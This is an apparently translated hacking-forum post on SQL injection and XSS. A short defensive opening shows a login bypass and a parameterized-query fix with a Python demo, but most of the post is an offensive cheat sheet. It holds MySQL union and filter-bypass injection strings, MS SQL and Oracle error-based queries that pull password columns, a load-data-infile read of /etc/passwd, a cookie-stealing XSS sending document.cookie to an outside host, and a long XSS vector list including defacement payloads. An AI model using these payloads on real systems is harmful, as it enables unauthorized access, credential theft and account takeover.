Author: yahoo2010
Forum: http://ashiyane.org/forums
Y! ID: ali_rezamilan
Date: 1390/06/06

Contents:
    SQL injection
    XSS
SQL Injection

Consider a login form in an SQL-backed application. The user enters a Login ID and a Password, and the application builds its SQL query directly from those two fields:

    "SELECT COUNT(UserID) FROM tblUsers WHERE UserID='" & UserID.Text & "' AND Pass='" & Password.Text & "'"

UserID and Password are the TextBox controls of the form. If the user mahdi logs in with the password 123, the SQL that is executed is:

    SELECT COUNT(UserID) FROM tblUsers WHERE UserID='mahdi' AND Pass='123'
Now suppose the attacker types

    ' OR 1=1

into the login fields instead of real credentials. The SQL that is sent to SQL Server becomes:

    SELECT COUNT(UserID) FROM tblUsers WHERE UserID='' OR 1=1 AND Pass='' OR 1=1

Because 1=1 is always true, the condition UserID='' OR 1=1 holds for every row, COUNT returns a non-zero value and the attacker is authenticated without knowing a single password. SQL Server executes the string exactly as it is handed to it; it cannot tell the injected text from the query the developer wrote.
In ASP.NET the remedy is a parameterized query instead of string concatenation. The values entered by the user are handed to the command as parameters, so they are always treated as data and never as part of the SQL:

    Dim strSQL As String = "SELECT COUNT(UserID) FROM tblUsers WHERE UserID=@UserID AND Password=@Password"
    Dim cmndCheck As OleDbCommand = New OleDbCommand(strSQL, _Connection)
    cmndCheck.Parameters.Add("@UserID", UserID.Text)
    cmndCheck.Parameters.Add("@Password", Password.Text)
    cmndCheck.Connection.Open()
    Dim IsValid As Integer = cmndCheck.ExecuteScalar()
    If IsValid > 0 Then
        ' Some code here: the user is authenticated
    Else
        ' Some code here: the user is not authorized to view the page
    End If
This is what stops the SQL injection: the text of the query is fixed in advance, and whatever the user types can only ever be a parameter value. As a rule, never build SQL by concatenating user input with & or +, and use parameters consistently throughout the application.
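To make the difference concrete, here is an added Python example (not from the original post) that runs the tutorial's login query both ways against a constructed in-memory SQLite table standing in for tblUsers: the concatenated form is fooled by the ' OR 1=1-- input shown on this page, the parameterized form is not.

```python
import sqlite3

# Constructed sample data standing in for the tutorial's tblUsers table.
USERS = [("mahdi", "123"), ("ali", "secret")]


def make_db():
    """Create an in-memory SQLite database with the tblUsers table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tblUsers (UserID TEXT, Pass TEXT)")
    con.executemany("INSERT INTO tblUsers VALUES (?, ?)", USERS)
    return con


def count_concatenated(con, user_id, password):
    """The vulnerable form: user input is pasted into the SQL text, just like
    the '& UserID.Text &' concatenation in the VB.NET snippet above."""
    sql = ("SELECT COUNT(UserID) FROM tblUsers WHERE UserID='" + user_id
           + "' AND Pass='" + password + "'")
    return con.execute(sql).fetchone()[0]


def count_parameterized(con, user_id, password):
    """The fixed form: the SQL text is constant and the values are bound by the
    driver, so they are always data and can never alter the query."""
    sql = "SELECT COUNT(UserID) FROM tblUsers WHERE UserID=? AND Pass=?"
    return con.execute(sql, (user_id, password)).fetchone()[0]


def login(counter, user_id, password):
    """Mirror the tutorial's check: authenticated when COUNT(UserID) > 0."""
    con = make_db()
    try:
        return counter(con, user_id, password) > 0
    finally:
        con.close()


if __name__ == "__main__":
    injected = "' OR 1=1--"          # payload from this page's cheat sheet
    for name, counter in (("concatenated", count_concatenated),
                          ("parameterized", count_parameterized)):
        print(name, "mahdi/123 ->", login(counter, "mahdi", "123"))
        print(name, "injected  ->", login(counter, injected, "anything"))
```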
XSS

Take a page that reflects one of its URL parameters into the HTML it returns:

    http://www.folan.com/login.php?bahman=

If the value is written into the page without HTML encoding, a request such as

    http://www.folan.com/login?bahman=<h1>salam</h1>

makes the browser render the injected <h1> as real HTML. The same reflection point can carry script; the variant below is aimed at the victim's cookie:

    http://foloan/bahman.php/n=<script>document.location.replace('http://nofozgar/begir?borohalakon=document.cookie)</script>
MySQL union-based injection, step by step (the /**/ forms are the "bypass" variants, with comments in place of spaces):

    -999/**/order/**/by/**/column/*
    -999/**/and/**/1=0/**/union/**/all/**/select/**/column/*
    999+order+by+column--
    999+and+1=0+union+all+select+column--
    999+and+1=0+union+all+select+column+from+user--

Note: on MySQL version 4 the table names have to be guessed: from+user or users or ...

    999+and+1=0+union+all+select+column(1,2,user,password)+from+users--
    999/**/and/**/1=0/**/Union/**/all/**/Select+column/**/from+iNformatTion_Schema--

To get tables:
    999+and+1=0+Union+all+Select+column+(table_name)+from+iNformatTion_Schema.tables--
To get tables with bypass:
    999/**/and/**/1=0/**/Union/**/all+Select/**/column+(table_name)+from+iNformatTion_Schema.tables--
To get tables with group_concat:
    999+and+1=0+Union+all+Select+column+group_concat(table_name)+from+iNformatTion_Schema.tables--
    999+Union+Select+all+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8+from+iNformation_schema.columns--
    999+Union+Select+all+1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8+from+iNformation_schema.tables--
SQL injection in ASP (MS SQL Server), using error messages to learn column names:

    'having 1=1--

The error names the first column, e.g. b2b_supplier_id. Then

    'group by b2b_supplier_id having 1=1--

(enter this again in the login or username field and log in) reveals the next column, b2b_supplier_loginname, and so on for each further column.
MySQL cheat sheet

Basics and variations

Operators:
    SELECT 1 && 1;
    SELECT 1 || 1;
    SELECT 1 XOR 0;
Evaluate (all render TRUE or 1):
    SELECT 0.1 <= 2;
    SELECT 2 >= 2;
    SELECT ISNULL(1/0);
Math:
    SELECT FLOOR(7 + (RAND() * 5));
    SELECT ROUND(23.298, -1);
Misc:
    SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
    SELECT MD5('abc');
Benchmark:
    SELECT BENCHMARK(10000000,ENCODE('abc','123'));
Gathering info

Table mapping:
    SELECT COUNT(*) FROM tablename
Field mapping:
    SELECT * FROM tablename WHERE user LIKE "%root%"
    SELECT * FROM tablename WHERE user LIKE "%"
    SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
    SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
User mapping:
    SELECT * FROM tablename WHERE email = 'user@site.com';
    SELECT * FROM tablename WHERE user LIKE "%root%"
    SELECT * FROM tablename WHERE user = 'username'
Extracting hashes:
    SELECT user FROM login WHERE user = 'root'
    UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
    BENCHMARK(1000000,MD5('x')),null) FROM login
Example:
    SELECT user FROM login WHERE user = 'admin'
    UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
    BENCHMARK(1000000,MD5('x')),null) FROM login
A quoteless example:
    SELECT user FROM login WHERE user =
    CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(39))
    UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
    BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login

Misc

Retrieve /etc/passwd file, put it into a field and insert a new user:
    load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'
Then login!

Write the DB user away into tmp:
    SELECT host,user,password FROM user into outfile '/tmp/passwd';

Bypass (hex-encoded string instead of a quoted one):
    SELECT * FROM login WHERE user = 0x726F6F74
Hex-encoding 'root' gives you 726F6F74; then add 0x in front.
Changing a user's username/password by injecting an UPDATE on the user table (username column):

    WWW.SITE.COM/INDEX.PHP?ID=42 update+user+set+username=alireza--

The password hash e10adc3949ba59abbe56e057f20f883e corresponds to the password 123456.
Oracle SQL injection (error-based, via utl_inaddr)

1:
    ' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
    Common problems

2:
    Display the database version information in an error message (injected into an integer)
    [low privilege]

3:
    or 1=utl_inaddr.get_host_address((select sys.stragg (distinct username||chr(32)) from all_users))--
    If stragg is not available, the same can be done with XMLDB; stragg is limited to 4096 bytes

4:
    Get the privileges of this account. Iterate via r=1, r=2, r=3, ...
    [low privilege]
    No

5:
    or 1=utl_inaddr.get_host_address((SELECT sys_context('USERENV', 'ISDBA') FROM dual))
    or 1=utl_inaddr.get_host_address((SELECT sys_context((select chr(85)||chr(83)||chr(69)||chr(82)||chr(69)||chr(78)||chr(86) from dual), (select chr(73)||chr(83)||chr(68)||chr(66)||chr(65) from dual)) FROM dual))
    If the usage of single quotes returns an ORA-0911 (invalid character) you should use the second string

6:
    or 1=utl_inaddr.get_host_address((select sys.stragg (distinct table_name||chr(58)||column_name||chr(58)||data_type||chr(58)||column_id||chr(59)) from user_tab_columns order by table_name,column_id))--
    Get a list of all user tables including the column name and type
    [low privilege]
    No
    No
String concatenation:
    'a' || 'b'
    concat('a','b')
    TBD

Other functions that put the version banner into an error message:
    1 or 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)--
    1 or 1=CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))--
When the injection is valid, the error message comes back (in the example the database user is scott). To look up ORA-01756:
    http://www.google.com/search?q=ora-01756
    http://www.techonthenet.com/oracle/errors/ora01756.php

The classic SQL injection tests for a string parameter are or 1=1-- and UNION SELECT. To pull data out through an error message, inject:

    or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Here the response contains ORA-01756.

Useful Firefox add-ons:
    https://addons.mozilla.org/de/firefox/addon/web-developer
    or
    https://addons.mozilla.org/de/firefox/addon/60

Instead of ORA-01756 you may get:
    ORA-24247 network access denied by access control list (ACL)

utl_inaddr performs DNS lookups (reference: http://psoug.org/reference/utl_inaddr.html), and this error means its network access is blocked by an ACL. If utl_inaddr cannot be used, ctxsys.drithsx.sn works instead:

    or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--

Each query can only return a single value, so several columns are joined with || (col1 || col2), and pentesters use rownum to limit the result to one row. In 11g the stragg function is available, which aggregates many rows into one string:

    or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner||';') from v$version))--

Listing every table that has a PASSWORD column:

    or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--

This turns up, for example, SHOP.SHOPUSER, whose password column can then be read:

    or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||';') from shop.shopuser))--

The same steps with utl_inaddr instead of ctxsys.drithsx.sn:

    or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
    or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||';') from user_role_privs))--
    or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--
    or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||';') from shop.shopuser))--
Characters to try when testing SQL strings:
    '
    /
    *
XSS vectors

<SCRIPT>alert('XSS');</SCRIPT>
<script><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by yahoo2010</img></script>
<script>alert(String.fromCharCode(104, 97, 99, 107, 32, 98, 121, 32, 121, 97, 104, 111, 111, 50, 48, 49, 48))</script>
><h1><img=http://up6.iranblog.com/uploads/13140259851.jpg>hack by yahoo2010</img></h1>
"><iframe src=http://www.google.de>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SC
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG
SRC=javascri&
#0000112t:alert�
040'XSS')>
<IMG
SRC=javascript:ale&#x
72t('XSS')>
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0027\0058\0053\0053\0027\0029'\0029">
><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e